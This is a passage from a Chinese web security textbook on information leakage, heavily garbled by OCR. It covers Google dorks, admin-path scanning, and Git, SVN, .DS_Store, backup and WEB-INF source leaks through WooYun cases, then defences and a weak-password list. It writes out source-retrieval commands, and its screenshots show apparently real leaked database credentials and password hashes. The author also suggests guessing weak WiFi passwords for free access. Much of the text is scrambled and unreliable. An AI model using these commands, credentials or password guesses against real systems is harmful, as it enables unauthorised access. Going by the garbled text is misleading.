PHP Bookshelf App | PHP | Google Cloud Platform 
hps 








PHP on Google App Engine | App Engine Documentation | Google ... 
aps /coud goagle comt | 可 泽 此 页 
App Engine oiers youa ee 











图 1-16 site:google.com inurl:php 命令 结果 


第 1 章 信息 泄露 


现在 我 们 知道 可 以 通过 谷歌 搜索 语法 来 进行 URL 筛 选 , 攻击 者 同样 知道 此 方法 , 而 大 部 
分 网 站 后 台 的 链接 地 址 包含 “admin ”关键 词 ， 所 以 攻击 者 可 以 使 用 关键 词 “site:google.com 
inurl:admin” 进 行 搜索 ， 搜 索 结果 如 图 1-17 所 示 。 





《 gle site:google.com inurladmin yao 








G Suite Admin Console — Secure 


ntrols & Mobile Device ... - Google 
https://gsuite.google.com/productadmin/ 一 译 1 










,sers, activale services， 
mobile de 





ite - Google Admin console 
le.com/po) 









unts cannot be used to sign 
io 


isten and type the numbers you 








图 1-17 输入 site:google.com inurl:admin 命令 搜索 
攻击 者 也 可 能 使 用 其 他 关键 字 ， 比 如 inurl:login.php 或 者 index.php 等 , 不 同 的 关键 词 搜索 


出 来 的 结果 不 一 致 。 因此 , 对 于 开发 者 来 说 , 尽量 不 要 使 用 这 种 大 众 化 的 地 址 作为 后 台 入 口 ， 
最 好 用 单独 的 域名 作为 后 台 管 理 地 址 。 


2. 御 剑 后 台 扫描 器 


现在 再 来 看 看 使 用 工具 查找 后 台 , 扫描 后 台 的 工具 十 分 多 , 这 里 将 介绍 一 种 比较 常见 的 
后 台 扫描 工具 一 一 御 剑 后 台 扫描 器 ， 御 剑 后 台 扫描 器 与 Layer 有 些 类 似 ， 不 同 的 是 Layer 用 于 
搜索 域名 部 分 ， 而 御 剑 后 台 扫描 器 用 于 搜索 URI 部 分 。 

御 剑 后 台 扫 描 工 具 操作 起 来 非常 方便 ， 在 域名 框 位 置 输入 域名 后 ， 单 击 “ 开 始 扫描 ”， 
如 果 目 录 被 扫描 出 来 ， 就 会 在 下 面 的 列表 中 展示 ， 双 击 便 可 以 打开 此 链接 。 如 图 1-18 所 示 是 
御 剑 扫描 器 正在 扫描 网 站 后 台地 址 。 


3. 小 结 








御 剑 扫描 器 是 利用 字典 找 网 站 后 台 , 而 搜索 引擎 则 是 利用 谷歌 把 网 站 的 后 台地 址 收录 进 
去 , 两 种 方法 攻击 者 都 会 经 常 使 用 , 如 果 使 用 工具 找 不 到 后 台 目 标 , 就 会 尝试 使 用 搜索 引擎。 
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(SS) ST By = a 
域名 : |permeste localhost | 3 
: [ETTTT [Fe 回 拓 No 
斌 程 : |20 《条 CPU 核心 * 5 最 佳 ) 交合 和 二 日 上 
直 : [5] ( 秒 超 括 页 面 本 友 ) 固定: 1 ee 日 者 
信和 村 扫 拓 线程 : 0。 可 这 度 ; 0/ 秒 


om 地 址 TP 响应 


1 
2 
3 
4 
5 














图 1-18 御 剑 扫描 器 正在 扫描 网 站 后 台地 址 


在 Web 安 全 体系 中 ， 很 多 开发 者 可 能 对 SQL 注入 、XSS 跨 站 漏洞 已 经 耳 熟 于 心 ， 而 源码 
泄露 问题 对 于 大 部 分 开发 者 来 说 就 相对 陌生 了 , 但 源码 泄露 导致 的 问题 并 不 少见 ， 在 过 往 的 
泄露 案例 中 ， 不 仅 是 小 网 站 有 此 问题 ， 在 一 些 大 型 网 站 中 同样 出 现 不 少 ， 并 因此 拿 到 
WebShell。 

比如 一 些小 型 企业 , 可 能 公司 并 没有 专用 的 服务 器 , 而 是 把 网 站 部 署 在 某 一 个 虚拟 主机 
上 ， 代 码 文件 比较 多 的 时 候 FTP 上 传 是 比较 慢 的 ， 于 是 开发 者 把 代码 先 打包 压缩 后 再 上 传 ， 
上 传 成 功 后 再 去 服务 器 解压 ， 这 虽然 解决 了 上 传 速度 慢 的 问题 ， 不 过 却 留 下 了 安全 隐患 。 
压缩 包 解压 后 如 果 没有 删除 ， 当 攻击 者 发 现 后 就 可 以 把 代码 压缩 包 下 载 下 来 ,因为 部 署 
到 服务 器 上 的 都 是 源 代码 ， 这 个 时 候 攻 击 者 就 可 以 通过 代码 进一步 挖掘 出 安全 漏洞 ， 如 文件 
上 传 、SQL 注 射 等 。 

本 节 将 介绍 5 种 常见 的 源码 泄露 方式 ,包括 Git 源 码 泄露 、SVN 源 码 泄露 、.DS_Store 文 件 
泄露 、 备 份 文件 泄露 和 WEB-INF/web.xml 泄 露 。 








1.2.1 Git 源码 泄露 


1. 漏洞 成 因 
Git 源 码 泄露 是 指 开发 者 因 Git 版 本 控制 器 使 用 不 当 而 造成 的 的 源码 泄露 。 当 开发 者 在 一 


个 空 目录 执行 git init 时 ，Git 会 创建 一 个 .git 目 录 。 这 个 目录 包含 所 有 Git 存 储 和 操作 的 对 象 。 
如 果 想 备份 或 复制 一 个 版 本 库 ， 只 需 把 这 个 目录 复制 到 另 一 处 就 可 以 了 。 


该 目录 的 结构 如 下 : 


HEAD 

config* 

description 

hooks/ 

index 

info/ 

objects/ 

refs/ 

在 这 些 结构 中 ，description 文 件 仅 供 GitWeb 程 序 使 用 ， 我 们 无 须 关 心 。 


多 config 文件 包含 项 目 特有 的 配置 选项 。 

多 info 目录 包含 一 个 全 局 性 排除 (global exclude ) 文件 ， 用 以 放置 不 希望 被 记录 
在 .gitignore 文件 中 的 忽略 模式 (ignored patterns ) 。 

多 hooks 目录 包含 客户 端 或 服务 端的 钩子 脚本 (hook scripts ) 。 


剩 下 的 4 个 条 目 很 重要 。 


4 HEAD 文件 指示 目前 被 检 出 的 分 支 。 

多 index 文件 保存 暂 存 区 信息 。 

多 objects 目录 存储 所 有 数据 内 容 。 

多。 refs 目录 存储 指向 数据 ( 分 支 ) 的 提交 对 象 的 指针 。 


开发 者 在 发 布 代码 的 时 候 ， 如 果 没 有 把 .git 目 录 删 除 ， 直 接 发 布 到 了 运行 目录 中 ， 攻 击 者 就 可 


以 通过 这 个 文件 夹 恢复 源 代 码 (http:/www.localhosttest.gitconfig ) ， 通 常会 利用 工具 GitHack， 这 


证 





[ 具 下 载 下 来 之 后 操作 特别 简单 ， 只 需要 执行 命令 “GitHack.py http://www.localhost.test/.git/”， 


就 可 以 将 源 代 码 复制 下 来 。 


GitHack 能 解析 .git/index 文 件 ， 并 找到 工程 中 所 有 文件 名 和 文件 shal， 然 后 去 .git/objects/ 


文件 夹 下 载 对 应 的 文件 ， 通 过 zlib 解 压 文件 ， 按 原始 的 目录 结构 写 入 源 代码 。 
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2. Git 源 代 码 泄露 案例 


2015 年 5 月 ， 白 帽子 “lijiejie” 提 交 漏洞 “ 某 站 点 git 泄露 源 代 码 ”。 
缺陷 编号 : wooyun-2015-0117332 




















在 此 案例 中 ， 白 帽子 发 现 URL (http://qq.m.localhost.com/.git/) 可 以 访问 ， 于 是 通过 工 
具 GitHack 下 载 里 面 的 文件 ， 如 图 1-19 所 示 为 githack.py 执行 中 的 截图 

















ES 











图 1-19  githack.py 执行 中 的 截图 


源码 被 下 载 下 来 之 后 ， 白 帽子 打开 其 中 一 个 代码 文件 ， 可 以 看 到 里 面 的 源 代码 ， 如 图 
1-20 所 示 。 





5 Java Decompiler -| Ea 
Fle Edit Navigate Help 


已 | 外 用 








sdass | HealthCheckServiet.class 




















图 1-20 看 到 的 源 代码 


1.2.2 ”SVN 源码 泄露 

1. 漏洞 成 因 

SVN 是 Subversion 的 简称 ， 是 一 个 开放 源 代码 的 版 本 控制 系统 ， 相 较 于 RCS、CVS， 它 
采用 分 支管 理 系统 ， 设 计 目 标 是 取代 CVS。 互 联网 上 很 多 版 本 控制 服务 已 从 CVS 迁 移 到 
Subversion 。 

很 多 网 站 都 使 用 SVN 版 本 控制 系统 ， 和 使 用 Git 版 本 控制 器 类 似 ， 很 多 开发 者 网 站 安全 
意识 不 足 ， 代 码 放 到 生产 环境 中 后 ， 没 有 清理 SVN 的 一 些 信息 ， 导 致 SVN 残 留 ， 因 此 攻击 者 
可 以 使 用 工具 dvcs-ripper 下 载 网 站 源码 。 

此 工具 的 GitHub 地 址 : https:Wgithub.com/kosVdvcs-ripper。 

利用 命令 如 下 : 

rip-svn.pl -v -u http://www.localhost.test/.svn/ 

2. SVN 源 代码 泄露 案例 


2015 年 10 月 ， 和 白 帽 子 提交 漏洞 “ 某 站 源码 泄露 ”。 

缺陷 编号 : wooyun-2015-0149331。 

在 该 厂商 的 系统 中 有 一 处 域名 为 data.localhost.com， 白 帽子 发 现下 面 的 地 址 可 以 访问 到 
http://data.localhost.com/sitemetrics/.svn/entries。 

白 帽子 知道 使 用 SVN 版 本 控制 器 会 在 目录 中 生成 .svn 文件 夹 ， 于 是 猜测 该 处 存在 源码 
泄露 问题 ,于 是 使 用 工具 dvcs-ripper 对 其 进行 了 一 番 验 证 , 验证 证 实 了 最 初 的 猜测 ， 并 得 出 
了 如 图 1-21 所 示 的 目录 以 及 代码 文件 。 

















图 1-21 发 现 的 目录 及 代码 文件 
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在 文件 目录 中 发 现 了 一 个 比较 敏感 的 文件 名 ， 打 开 后 查看 ， 发 现 里 面包 含 数据 库 地 址 、 
用 户 名 、 密 码 等 信息 ， 如 图 1-22 所 示 。 


一 REET7HRESC5I5J 000/31 tomar Ton 























四 configjni_online.php - 2345 文 本 得 看 器 
文件 四 ”篇 缠 四。 视图 VW) 格式 (M) 工具 D 
DB 人 | :ERxX|” 


<php eit 7> DO NOT REMOVE THIS LINE 
fle automatically generated or modified by Sitemetrics: you can manually ove 





ldbname = "sitemetrics” 
bles_prefx= "silemetrics_" 


[superuser] 

login = "shopin" 

ofg password = "24eb0869d3a84217bb68703d99a2e907" 
lemail = '33163987@qqcomr 

lsalt= "ecc355d04a69f21ac616cfl3eb185afa" 


[General] 
qusted_hosts[] = "11778.5 228" 


[Pluginsinstalled] 
JPluginsinstalledl] = "Login" 
JPluginsinstalledl] = "CoreAdminHome" 
JPluginsinstalled[] = "UsersManager 
JPluginsinstalledl] = "SiesManager 











图 1-22 发 现 的 数据 库 地 址 、 用 户 名 、 密 码 等 信息 
1.2.3” .DS_Store 文件 泄露 
1. 漏洞 成 因 
.DS_Store 文 件 MAC 系 统 用 来 存储 当前 文件 夹 的 显示 属性 ， 比 如 文件 图 标的 摆 放 位 置 。 
用 户 删除 以 后 的 副作用 就 是 这 些 信息 将 会 失去 。 
这 些 文件 本 来 是 给 Finder 使 用 的 ， 但 它们 被 设想 作为 一 种 更 通用 的 有 关 显 示 设置 的 元 数 
据 存储 ， 如 图 标 位 置 和 视图 设置 。 当 网 站 管理 员 需 要 上 传代 码 的 时 候 ， 安 全 的 操作 应 该 是 


把 .DS_Store 文 件 删除 ， 因 为 里 面包 含 一 些 目录 信息 ， 如 果 没 有 删除 ， 攻 击 者 通过 .DS_Store 
就 可 以 知道 这 个 目录 里 面 所 有 的 文件 名 称 ， 从 而 掌握 更 多 信息 。 


在 发 布 代码 时 未 删除 文件 夹 中 隐藏 的 .DS_store 被 发 现 后 ， 获 取 了 敏感 的 文件 名 等 信息 。 
攻击 者 可 以 利用 访问 URL(http://www.localhost.test/.ds_store ) 的 方式 来 判断 是 否 存在 DS_store 
泄露 ， 如 果 存在 泄露 ， 使 用 工具 dsstoreexp 就 可 以 轻松 地 下 载 源 代码 。 

例如 下 面 的 命令 : 

ds store exp.py http://www.localhost.test/.DS_Store 








2. .DS_Store 泄露 案例 


2015 年 9 月 ， 和 白 帽子 “深度 
信息 (谨慎 使 用 Mac 系统 ) ” 
缺陷 编号 : wooyun-2015-091869 


安全 实验 室 ” 提 交 漏 洞 “ 某 网 站 DS_Store 文件 泄露 敏感 


在 该 厂商 可 视 化 系统 事业 部 网 站 中 ， 把 苹果 的 隐藏 文件 DS_Store 也 搬 到 了 生产 环境 中 ， 
导致 泄露 了 目录 结构 ， 从 而 被 攻击 者 获取 到 后 人 台 管 理 页 面 和 数据 库 文件 。 打 开 文 件 
http://www.localhost.com/.DS_Store， 可 以 看 到 如 图 1-23 所 示 的 内 容 。 


TT 下 
ee ncontalaer Shows eeoar Wingow ungs\s eener Viet [shows tarbar ee 
ut, " 








于 6255, 77), C09, 42360381 有 ro 起 朱宇 
ier1- Phpllocolos NM 
a 


oa ent qr 100FF Se ty mascroliresitiony 
ar senowl eo eview ridspaeioge eo oy 
人 Epfilesmong + nurrsis 





图 1-23 看 到 的 敏感 信息 
通过 图 中 的 内 容 可 以 看 到 两 处 比较 敏感 的 文件 ，tel_manage.php 及 tcl_cctv.sql。 于 是 白 


帽子 通过 此 处 泄露 的 信息 猜测 到 网 站 后 合 地 址 为 http://www.localhost.com/tcl_manage.php， 


数据 库 文件 URL 为 http:/www.localhost.com/tcl_cctv.sql， 打 开 数 据 库 文件 对 应 的 URL， 在 
其 中 可 以 找到 后 台 管 理 员 账户 和 密码 ， 如 图 1-24 所 示 。 





PRT 9 
mas 二 MRA NFL I RR 
TROP TABLE IP EXISTS tel_adein 





RE TOE telat Co 
Lid ediunint (B) Rd 
5 


typer™ enun( cysten’, WT NILL defsult editor’, 
“usr varchar (100) or ME 














rarchar(50) NOT NULL 
onall” varchar (100) NOT ML defeult 
“wodul elist”text MOT NULL COWENT“ 棺 理 的 模块 ， 系 统 窟 理 员 无 多"， 
PRIIARY KEY (id) 

) ENGINE=NyISAK AUTO_INCRENENT=3 DEFAULT CHARSET=utf8; 

SET charocter_set_client = eaved_cs_clicnt 


一 Daming data for table `tcl_adnin 


LOCK TABLES “tel_admin” WRITE; 
e140000 ALTER TABLE tel_adrin DISABLE EBYS x/; 
TNSERT INTD “tcl_adwir” VALUES (1,” systex” 
/el40000 ALTER TABLE “tel_adrin ENABLE KETS */; 
UMEOCE TABLES; 










一 Table structure For tsble “tel_book 





图 1-24 ”找到 管理 员 账 户 和 密码 


用 户 名 : admin， 密 码 : c5b5ae8******bdfccc8beefec， 通 过 cmd5.com 解密 


后 ， 可 以 得 
到 真实 的 密码 ， 如 图 1-25 所 示 。 
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c5b5ae86fE. 1 5... 




















图 1-25 得 到 的 真实 密码 
在 后 台 URL 中 输入 账号 和 密码 ， 可 以 看 到 已 经 登录 成 功 ， 如 图 1-26 所 示 。 


© ”©||- oe rw 


和 mn 人] 仙 tq 立 测 nF 站 系 琉 首页 。 ”PR 页 动量 由- 一 一 一 
至 








图 1-26 通过 找到 的 密码 成 功 登录 
1.2.4 网 站 备份 压缩 文件 

1. 漏洞 成 因 

在 网 站 升级 和 维护 的 过 程 中 , 通常 需要 对 网 站 中 的 文件 进行 修改 , 此 时 就 需要 对 网 站 整 
站 或 者 其 中 某 一 页 面 进行 备份 。 

当 在 备份 文件 或 者 修改 的 过 程 中 , 缓存 文件 因为 各 种 原因 而 被 留 在 网 站 Web 目 录 下 ， 而 
该 目录 又 没有 设置 访问 权限 时 ， 便 有 可 能 导致 备份 文件 或 者 编辑 器 的 缓存 文件 被 下 载 ， 导 致 
敏感 信息 泄露 ， 给 服务 器 的 安全 埋 下 隐患 。 

该 漏洞 的 成 因 主要 是 管理 员 将 备份 文件 放 在 Web 服 务 器 可 以 访问 的 目录 下 。 这 种 漏洞 往 
往 会 导致 服务 器 整 站 源 代 码 或 者 部 分 页 面 的 源 代 码 被 下 载 和 利用 , 源 代码 中 所 包含 的 各 类 敏 
感 信息 〈 如 服务 器 数据 库 连 接 信息 、 服 务 器 配置 信息 等 ) 会 因此 而 泄露 ， 造 成 巨大 的 损失 。 
被 泄露 的 源 代码 还 可 能 会 被 用 于 代码 审计 ， 这 种 进一步 利用 会 对 整个 系统 的 安全 埋 下 隐患 。 

Tar .zip .7z .targz .bak -SWp .txt 
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2. 备份 压缩 文件 案例 


2014 年 5 月 ， 白 帽子 “Noxxx” 提 交 漏 洞 “ 某 站 备份 文件 泄露 ”。 

缺陷 编号 : wooyun-2014-050622。 

此 系统 的 URL 地 址 是 http://wm121.3.localhost.com， 白 帽子 无 意 中 发 现在 URL 加 上 域 
名 +.tar.gz， 也 就 是 URL http://wm121.3.localhost.com/wm121.3.tar.gz， 就 下 载 了 网 站 源 代码 ， 
在 源 代码 中 还 发 现 了 数据 库 的 链接 地 址 以 及 账号 信息 ， 如 图 1-27 所 示 。 





12:5 





Iapc.xcp.usernanest -—---— 
Javc.xcp.password=c, i 


jdbc .maxPoolSize=10 
jdbc .minFoolSize=5 

jdbc ,inicialPoolSizen5 
jdbc.idleConneccionTescpericd=1800 
jdbc ,maxTdleTimen3600 


:an06?aaennicade=cruecchara=cerFncadiza=urfagzerapareTimegehavior=conwerrTaxul1 
30063?uasgaacada=cxastcharaccaxgncadina=acfsrzszapacsTimeBshaviox=canvarcToNull 
ago6?sasgnicads=szaetcharaccsrEncedind=usfaizeroDacsTimeBchayioz=ccnyezcTolall 




















图 1-27 白 帽 子 发 现 的 网 站 源 代 码 
WEB-INF/web.xml 泄露 


1. 漏洞 成 因 

WEB-INF 是 Java 的 Web 应 用 安全 目录 , 该 目录 原则 上 来 说 是 客户 端 无 法 访问 的 ， 只 有 服 
务 端 才 可 以 访问 。 如 果 想 在 页 面 中 直接 访问 其 中 的 文件 ， 就 必须 通过 web.xml 文 件 对 要 访问 
的 文件 进行 相应 映射 才 行 。 

WEB-INF 主 要 包含 以 下 文件 或 目录 。 


全 


全 


. 


ba 
他 


/WEB-INF/web.xml: Web 应 用 程序 配置 文件 描述 了 servlet 和 其 他 应 用 组 件 配置 及 
命名 规则 。 

/WEB-INF/classes/: 含 站 点 所 有 的 class 文件 ， 包 括 servlet class 和 非 servlet class， 
它们 不 能 包含 在 .jar 文件 中 。 

/WEB-INF/lib/: 存放 Web 应 用 需要 的 各 种 JAR 文件 ， 放 置 仅 在 这 个 应 用 中 要 求 使 
用 的 ,jar 文件 ， 如 数据 库 驱动 .jar 文件 。 

/WEB-INEF/src/: 源码 目录 ， 按 照 包 名 结构 放置 各 个 Java 文件 。 
/WEB-INF/database.properties: 数据 库 配 置 文件 。 


但 是 ， 在 一 些 特定 的 场合 ， 攻 击 者 能 够 读 取 到 其 中 的 内 容 ， 从 而 造成 源码 泄露 。 
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2. WEB-INF 目录 配置 漏洞 案例 


2013 年 2 月 ， 和 白 帽子 “Asuimu” 提 交 漏 洞 “ 某 站 官方 网 站 WEB-INF 目录 配置 文件 导 
致 信息 泄露 ” 

缺陷 编号 : wooyun-2013-022906 

在 此 漏洞 中 ， 由 于 目录 权限 未 做 好 控制 ， 导 致 网 站 配置 信息 泄露 以 及 源码 泄露 问题 。 

此 漏洞 的 WEB-INF 目录 位 置 URL 为 http://enterprise.**#*.comy/topic/hcc/WEB-INF/， 白 帽 
子 首先 寻找 配置 文件 ( webxml) 的 位 置 ， 通 过 web.xml 的 位 置 得 到 URL 为 
http://enterprise.***.com/ topic/hcc/WEB-INF/web.xml, 访问 URL 后 , 能 看 到 如 图 1-28 所 示 的 
内 容 。 


Es 
€, http:/fenmierpr’:e huawel.com/topie /ee/ /WES-INF/web ml 
价 " 国 " 电 帝 > p> 安 29- IRO- D> 





<?xml version="1.0" encoding="UTF-8"?> 
- <web-app xsl:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.su 
xmlns:xsi="http:/ /www.w3.0rg/2001/XMLSchema-instance” xmlns="http://java- 
~ <context-param> 
<param-nameacantextConfiaLacationc/oaramaaam 
<param-valu 中 /WEB-INF/classes/applicationContext.xml dparam-value> 
</context-param: 
- <listener> 
<listener-class> org.springframework.web.context.ContextLoaderListener 
</listener> 





图 1-28 发现 的 网 站 文件 classes/applicationContext.xml 


白 帽子 发 现 有 一 个 classes/applicationContext.xml 文件 ， 访 问 此 文件 对 应 的 URL 后 ， 又 
从 此 文件 中 找到 了 数据 库 配置 文件 db-config.xml 的 路 径 ， 如 图 1-29 所 示 。 


3 hte/ erserpr'se huawei com/topic/ hee WEE NF lasses/application Context sm 





和合 " 国 -外 寺 页) 安全 (5)” 工具 (O)> 各- 





<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE beans SYSTEM "http://www.springframework.org/dtd/spring-beans-4 
- <beans> 





pplicationContext-dao.xml"/> 







<import reso! ‘db-config.xml"/> 
<!-- 配置 e -> 
<import resot pplicationContext-service.xml"/> 
<!-- 配置 一 > 
<import resource="applicationContext-common.xml"/> 
</beans> 








图 1-29 找到 数据 库 配 置 文件 db-config.xml 的 路 径 


打开 db-config.xml 对 应 的 URL 后 , 能 看 到 MySQL 的 连接 信息 ， 比 如 root Huaweil2012 
localhost 等 信息 ， 如 图 1-30 所 示 。 不 过 因为 数据 库 限制 ， 只 能 本 地 连接 ， 所 以 白 帽 子 并 没 
有 连接 上 数据 库 。 
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Brise huaWelicom/topie/hce/WEB-INF /classes/db-configaeml PD B0 | emerprisenuaw. | 





<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE beans SYSTEM "http://www.springframework.org/dtd/spring-beans-2.0.dtd" PUBLIC "-//SPRING//DTD 
- <beans> 
<!1-- 数据 源 配置 器 - 
~ <bean destroy-method="close" class="org.apache.commons.dbcp.BasicDataSource" id="dataSource"> 
- <property name="driverClassName”> 
<value>com.mysql.jdbc.Driver</value> 
</property> 
<property name="url"> 
<value>jdbc:mysql:/ /localhost:3307/hcc?characterEncoding=UTF-8</value> 
</property> 
<property name="username"> 
<value>root</value> 
</property> 
<property name="password"> 
<value>Huawei!2012</value> 
</property> 
<property name="maxActive"> 
<value>5</value> 








图 1-30 看 到 的 MySQL 连接 信息 


通过 此 漏洞 还 下 载 了 部 分 源 代码 , 比如 URL: http://enterprise.***.com/topic/hcc/login.jsp， 
对 应 如 图 1-31 所 示 的 源 代码 。 








文件 (月 ”编辑 (E) 格式 (O) 查看 (V) 帮助 (H) 





we page language="java” import=" java. util.*” pageEncoding=“utf-8°%> 
s” uri=”/struts-tags’%> 

《<%B page import="com,. commumnity. common. config. IbatisKey” %> 

Dg taglib prefix= cutpage”uri= /WEB-INFVcutpage. tld” %> 





Be path = request. getContextPath() ; 
Sking basePath = request. getSchene ()+ ://“+request. getServerNane ()+°:“+request. getServerPod 


<% 


%> 

《!DOCTYPE html PUBLIC “-//W3C//DTD XHDIL 1.0 Transitional//EN” “http://www.w3.org/TR/xhtnll 
htmnl] xmlns=“http://www. w3. org/1999/xhtnl”> 

<head> 

<meta http-equiv="“ Content-Type” content="“text/htnl; charset=utf-8” /> 

<link rel="s: :二 Ne text/css” href=“css/hec201210gin. css”/> 

Ce 人为， 仅仅 是 世界 500 强 </title> 


We 
function check() 


String userName = (String)session. getAttribute (IbatisKey. USER_USERNANME) ; 


Yar username = docunent. getElenentById(’ username’ ). value; 
var password = docunent. getElenentById(’ password’ ). value; 
(usernane 站 9 月 有 名” 2 usernaneg 


alert(" 
docunent. getElenentByid (“username”). focus () ; 
return false; 


证 (” ”== password || “密码 ”一 password) 
alert( “请 输入 密码 ) 





图 1-31 通过 漏洞 下 载 的 源 代码 
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1.2.6 ”防御 方案 


从 上 面 的 5 种 泄露 方式 可 以 看 出 ， 大 部 分 情况 都 是 代码 上 传 后 没有 及 时 清理 附带 信息 所 
造成 的 。 因此, 笔者 建议 代码 发 布 尽量 使 用 rsync 工 具 来 进行 , 因为 此 工具 同步 时 可 以 排除 一 
些 目 录 或 者 文件 ， 比 如 要 排除 所 有 .svn 文 件 ， 可 以 使 用 下 面 的 命令 行 来 排除 ，Git 同 理 。 

rsync -avlH --exclude=*.syn root(@191.2.168.1.1.100:~/tmp/ /data/version/test/ 

如 果 生 产 环境 不 能 使 用 rsync， 也 可 以 考虑 下 面 几 点 建议 。 

(1) Git 在 仓库 的 根 目录 新 建 一 个 文件 夹 ， 把 代码 放 入 此 文件 夹 中 ， 网 站 的 根 目录 应 该 
指向 此 文件 夹 ， 这 样 攻击 者 就 不 能 访问 到 .git 文 件 夹 的 内 容 了 。 

(2) 不 要 直接 使 用 Git 或 SVN 等 工具 拉 取 代码 到 生产 目录 ， 可 以 在 一 个 临时 目录 先 拉 取 
下 来 ， 把 其 中 的 一 些 版 本 控制 器 附带 信息 去 掉 后 再 同步 到 生产 目录 。 

(3) 使 用 MAC 系 统 的 开发 者 需要 注意 ， 不 要 把 .ds_store 文 件 上 传 上 去 ， 因 为 里 面包 含 
一 些 目录 信息 ， 会 导致 文件 名 称 泄露 。 

(4) Web 生 产 目 录 中 不 要 存放 代码 压缩 文件 ， 这 些 文件 极 有 可 能 被 攻击 者 发 现 ， 从 而 
下 载 下 来 。 





弱 口 令 (weak password) 其 实 是 长 期 以 来 一 直 存 在 的 问题 ， 直 到 今天 还 能 经 常 听 到 某 
厂商 公司 因为 存在 弱 口 令 问题 而 导致 大 量 内 部 或 外 部 用 户 信 息 泄露 , 甚至 商业 计划 和 机 密 泄 
露 ， 所 以 安全 密码 设置 的 重要 性 不 言 而 喻 ， 在 此 笔者 简要 谈 谈 弱 密码 方面 ， 也 就 是 经 常 说 到 
的 弱 口令 。 

其 实 , 设置 密码 的 强 弱 很 大 程度 上 与 个 人 习惯 和 安全 意识 有 关 , 当然 还 受 其 他 因素 影响 ， 
比如 公司 出 于 安全 考虑 要 求 设 置 强 密码 等 其 他 强制 硬性 要 求 。 笔者 认为 弱 口 令 大 致 可 以 分 为 
两 类 ， 一 类 是 服务 弱 口 令 ， 另 一 类 是 个 人 弱 口 令 。 


1.3.1 漏洞 成 因 


弱 口 令 没有 严格 和 准确 的 定义 , 通常 认为 容易 被 熟人 猜测 到 或 被 破解 工具 破解 的 口令 均 
为 弱 口令 。 弱 口令 指 的 是 仅 包含 简单 数字 和 字母 的 口令 ， 例 如 “123”“abc” 等 ， 因 为 这 样 
的 口令 很 容易 被 人 破解 ， 从 而 使 用 户 的 计算 机 面临 风险 ， 因 此 不 推荐 用 户 使 用 。 
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1. 应 用 场景 


弱 口 令 其 实 就 在 我 们 身边 ， 比 如 无 线 WIFI 也 有 弱 口 令 , 很 多 WIFI 的 密码 是 1234567890、 
8888888888 等 。 前 几 年 流量 还 比较 贵 时 ， 笔 者 就 用 这 两 组 数字 在 不 少 地方 蹦 过 网 。 同 样 ，10 
个 1 之 类 的 重复 数字 都 是 常用 密码 。 当 你 在 火车 站 需要 上 网 但 又 不 舍得 花 钱 去 旁边 的 咖啡 厅 
时 ， 可 以 试 试 这 些 弱 口令 。 

除了 简单 的 数字 外 , 有 时 候 商 家 的 电话 号 码 或 者 跟 他 们 相关 的 数字 都 可 能 是 无 线 网 络 密 
码 ， 甚 至 有 时 候 商 家 店名 + 简单 数字 (例如 123) 也 是 密码 。 弱 口令 一 般 情况 下 还 可 能 有 用 户 
身份 的 相关 信息 ， 因 此 保护 口令 安全 还 必须 保护 用 户 信息 。 





2. 弱 密码 Top50 


根据 一 些 明 文 密码 统计 出 来 的 弱 密 码 Top50 如 表 1-1 所 示 。 


弱 密码 
0123456789 
aal23456789 
zxcvbnm 
QAZ123 
asdfghjkl 
wang123456 
qwer1234 
123456789qq 
q123456789 
lqazxsw2 
100200 
123qweasd 
7894561230 


1.3.2 ”漏洞 危害 








弱 密码 
7758521 
123456789 
Zzxc123 
qq123123 
abcd123 
7758258 
zhang123 
123321 
1A2B3C4D 
asd123 
789456123 
5845201314 


qwel23 


弱 密 码 top50 


123456. 
000000000 
qq123456789 
123698745 
1q2w3e4r 
nihao123 
123123 
w123456 
1233211234567 
Z123456789 
520520 
7708801314520 


110120 
147258369 
1234554321 
123qwe 
11111111 
allllll 
584520 
456852 


wang123 
123456789.. 


lq2w3e 
123abc 





当今 很 多 地 方 以 用 户 名 (账号 ) 和 口令 作为 鉴 权 , 口令 的 重要 性 可 想 而 知 。 口 令 就 相当 
于 进入 家 门 的 钥匙 ， 当 他 人 有 一 把 可 以 进入 你 家 的 钥匙 时 ， 想 想 你 的 安全 、 财 物 、 隐 私 等 是 
香 会 受到 威胁 。 因 为 弱 口 令 很 容易 被 他 人 猜 到 或 破解 ， 所 以 如 果 你 使 用 弱 口令 ， 就 像 把 家 门 


钥匙 放 在 家 门口 的 消防 栓 柜 子 呈 





有 ， 是 非常 危险 的 。 
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1.3.3 ”漏洞 案例 

弱 口 令 引 发 的 漏洞 案例 非常 多 ,比较 常见 的 是 测试 账号 与 弱 密 码 ， 比 如 用 123456 这 种 密 
码 作 为 默认 密码 。 下 面 将 通过 两 个 案例 来 分 析 白 帽子 是 如 何 发 现 弱 口令 漏洞 的 。 

1. 测试 账号 上 线 

2016 年 1 月 ， 乌 云 主 站 “路 人 甲 ” 提 交 了 一 个 弱 口令 漏洞 。 网 站 名 称 是 黑 桃 互动 ， 是 某 
游戏 平台 的 一 个 网 站 ， 做 游戏 业务 ， 有 和 白 帽 子 发 现 了 一 个 后 台 登 录 地 址 ， 该 地 址 无 须 输入 验 


证 码 就 可 以 登录 , 于 是 白 帽 子 使 用 一 些 简单 的 工具 很 快 就 得 到 了 用 户 名 (test) 和 密码 (test) ， 
如 图 1-32 所 示 。 














图 1-32 ”获取 用 户 名 与 密码 
登录 之 后 可 以 看 到 后 台 管理 系统 中 的 一 些 统计 数据 ， 如 图 1-33 所 示 。 





日 其 ~ 充值 人 数 儿 充值 全 全 $$ 角色 ARPPU 
2016-01-08 3 116 38.67 
2z616-91-97 3 129 48 
2016-01-06 1 100 100 
2016-01-05 3 195 65 
2016-01-04 2 1919 565 
2816-01-03 2 1100 550 
2816-01-02 2 1 530 
2816-01-01 1 1900 1000 
2615-12-31 2 30 265 
2915-12-38 4 615 153.75 








图 1-33 后 台 的 统计 数据 
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从 弱 口 令 账 号 及 密码 中 可 以 看 出 , 该 账号 是 用 于 测试 的 , 所 以 账号 的 密码 设置 得 非常 简 
单 ， 在 发 布 到 线 上 后 也 没有 及 时 删除 。 


2. 后 台 弱 口令 案例 


2015 年 7 月 ， 白 帽子 “ 沦 沦 ” 提 交 了 一 个 医药 系统 后 台 弱 口令 问题 。 

事件 起 因 是 白 帽子 准备 在 该 平台 买 药 , 发 现 要 买 药 必须 下 载 该 平台 的 App, 在 下 载 App 
